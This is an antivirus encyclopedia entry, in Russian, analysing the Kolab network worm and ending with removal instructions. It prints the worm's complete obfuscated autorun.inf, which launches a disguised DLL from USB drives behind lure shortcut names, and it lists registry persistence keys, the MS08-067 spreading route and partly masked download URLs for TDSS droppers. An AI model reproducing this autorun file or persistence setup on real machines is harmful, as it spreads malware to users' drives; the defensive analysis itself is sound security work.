Net-Worm.Win32.Kolab.ylu

Технические детали

Сетевой червь, создает свои копии на съемных дисках, а также загружает и устанавливает другое программное обеспечение на зараженном компьютере без ведома пользователя. Является приложением Windows (PE-DLL файл). Имеет размер 60928 байт. Упакована неизвестным упаковщиком. Распакованный размер - около 136 Кб. Написана на C++.

Инсталляция

Копирует свое тело во временный каталог текущего пользователя под именем: <>%Temp%\srv<rnd1>.tmp где <rnd1> - случайный набор из цифр и букв латинского алфавита, например "7E4" или "1E8".

Для автоматического запуска созданной копии червя при каждом следующем старте системы создается служба, за которую отвечает ключ системного реестра:

[HKLM\System\CurrentControlSet\Services\srv<rnd1>]

В отдельном потоке червь непрерывно восстанавливает запись о своей службе в системном реестре. Для работы в безопасном режиме, червь создает следующую запись в системном реестре:

[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\srv<rnd1>]  "(default)"="service"

Распространение

Червь имеет следующие механизмы распространения:

• Распространяется по сети зараженного компьютера, используя уязвимость MS08-067.
• Червь копирует свое тело на все доступные для записи съемные диски, подключаемые к зараженному компьютеру:

  <имя зараженного диска>:\setup50045.fon

  Также создаются файлы:

  <имя зараженного диска>:\myporno.avi.lnk  <имя зараженного диска>:\pornmovs.lnk  <имя зараженного диска>:\setup50045.lnk  

  Которые предназначены для запуска червя.

  Вместе со своей копией червь помещает в корневой каталог зараженного диска файл:

  <имя зараженного диска>:\autorun.inf

  следующего содержания:

  [AUTORuN]  acTiON=opEN  eixrgvyqxnqvgomwivn=trppqscjmhqpcfp  ICoN=%wInDir%\SySTEm32\shELl32.Dll,4  oxvgyrdxbiqedrfhcvnhxcnsrimepigtwgheh=givscvssyxxapiicclucwk  USeAUtOplAy=1  txdkjbh=yfmnbyowpigsbnaxqfhqmeqe  OpeN=RunDLl32.exE SetuP50045.foN,9D025  ekrvkkwgfucivppdrtavoe=lacmlkuxqkcfyuqipufgse  sHell\ExPlORe\command=ruNDLl32.eXe SETuP50045.foN,9D025  ltuqtafivakqjmxfadfopw=mqdcyvbgpwdguytatvrk  SHell\OpeN\cOMMaND=rUNDlL32.EXe SEtUP50045.FOn,9d025  jbdodnvlwdeqo=trirjdmlfttsdtiicwfbtvcx  

  Данный файл обеспечивает червю возможность запускаться каждый раз, когда пользователь открывает зараженный раздел при помощи программы "Проводник".

Созданным файлам присваиваются атрибуты "скрытый" и "системный".

Деструктивная активность

Червь выполняет внедрение своего кода в системный процесс:

spoolsv.exe

Отвечающий за работу службы:

spooler

После чего в разных потоках выполняет инсталляцию и распространение. Свои настройки червь хранит в следующем файле:

%Temp%\srv<rnd1>.ini

Который содержит следующие строки:

[main]  source=1  affid=50045  id=bbbbbbbbbbbb<ID>  server=http://195.**.***.136/  downloaded=1  

где <ID> - значение параметра "MachineGuid" в ключе системного реестра:

[HKLM\Software\Microsoft\Cryptography]

Червь обращается по следующему URL адресу:

http://195.***.***.138/service/listener.php?affid=50045  

И выполняет загрузку стороннего программного обеспечения, по следующему URL адресу:

http://195.***.***.139/service/scripts/files/aff_50045.dll

На момент создания описания загружались различные модификации вредоносов семейства Trojan-Dropper.Win32.TDSS.

Загруженный файл сохраняется во временном каталоге текущего пользователя:

%Temp%\<rnd2>.tmp

где <rnd2> - случайный набор из цифр и букв латинского алфавита. Затем червь запускает на выполнение загруженный файл.

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

1. Остановить службу:

   spooler

   для этого нужно выполнить следующую команду:

   sc stop spooler

2. Удалить ключи системного реестра:

   [HKLM\System\CurrentControlSet\Services\srv<rnd1>]    [HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\srv<rnd1>]  

3. Удалить файлы:

   %Temp%\srv<rnd1>.tmp  %Temp%\srv<rnd1>.ini  <имя зараженного диска>:\setup50045.fon  <имя зараженного диска>:\myporno.avi.lnk  <имя зараженного диска>:\pornmovs.lnk  <имя зараженного диска>:\setup50045.lnk  <имя зараженного диска>:\autorun.inf  %Temp%\<rnd2>.tmp  

4. Удалить оригинальный файл червя (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).